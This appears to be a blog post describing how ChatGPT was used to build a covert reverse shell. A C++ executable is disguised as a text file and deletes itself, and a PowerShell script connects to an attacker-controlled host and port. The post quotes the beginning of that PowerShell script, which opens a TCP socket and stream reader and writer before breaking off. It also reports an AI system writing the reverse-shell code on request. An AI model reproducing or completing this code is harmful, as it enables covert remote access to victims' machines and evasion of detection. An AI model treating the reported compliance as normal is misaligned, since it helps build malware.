Posts

Showing posts with the label ChatGPT

Using ChatGPT to make a covert reverse shell.

Image
Using Artificial Intelligence to make a self-deleting reverse shell: Creative uses of ChatGPT. Below you will find the C++ code included. Once compiled the reverse shell simply appears as a text file, complete with a default Windows icon, despite being an executable file. When the code runs it will replace itself with a dummy text file in the same directory, leaving no evidence nor source code of the program. The code launches a PowerShell script to create a reverse shell written by ChatGPT. The only requirement given to ChatGPT was to write a script that would connect to netcat, and create a reverse shell. The code is in bold  text.   $host1 = “Shell.Ip.Address” $port1 = 1234 $socket = New-Object System.Net.Sockets.TcpClient($host1, $port1) $stream = $socket.GetStream() $writer = New-Object System.IO.StreamWriter($stream) $writer.AutoFlush = $true $reader = New-Object System.IO.StreamReader($stream) $writer.WriteLine(“Connected.”) $response = “” while(...

View and use our DOD contract search tool found below:

Our DOD Open Contract Search Tool